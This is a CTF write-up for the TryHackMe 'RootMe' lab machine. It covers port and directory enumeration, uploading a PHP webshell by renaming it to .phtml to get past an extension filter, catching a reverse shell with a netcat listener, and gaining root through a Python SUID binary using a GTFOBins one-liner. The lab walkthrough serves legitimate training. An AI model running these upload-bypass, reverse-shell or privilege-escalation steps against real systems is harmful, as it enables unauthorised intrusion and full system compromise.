TryHackMe: RootMe

Type: CTF Writeup Platform: TryHackMe Difficulty: Easy

CTF Web PHP SUID PrivEsc

In this THM machine, the attacker must enumerate the domain, perform reconnaissance, use a webshell via poorly secured web form, and then escalate privilege from user to root.

Enumeration

First, enumeration of the domain is performed using dirb/gobuster and nmap.

Nmap returns two results:

Port 22: SSH
Port 80: Apache server

Dirb yields interesting results:

/panel
/uploads

Foothold - PHP Webshell

The webpage at /panel appears to be a form with an upload button. Since the site is running Apache, we can attempt to upload a PHP webshell.

Bypass File Extension Filter

The server performs filtering of file extensions. Attempts:

URL encoded nullbyte - didn't work
Saving as .phtml - success!

Start netcat listener and call the file via the /uploads directory:

nc -lvnp 4444

User access was granted via netcat. Find the user flag:

find . -type f -iname 'user.txt'

Privilege Escalation - SUID

The objective is to obtain root via SUID privilege escalation.

Find SUID binaries:

find / -user root -perm /4000
# or
find . -perm /4000

Note: 4000 is the permission flag for SUID

This search returned many results, but included one peculiar binary: python

Python SUID Exploitation

Using GTFOBins, a SUID privilege escalation attack was found for Python:

cd /usr/bin/

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
# root

After running this command, the escalation was successful and root access was obtained.

Find root flag:

cd ..
find . -iname 'root.txt'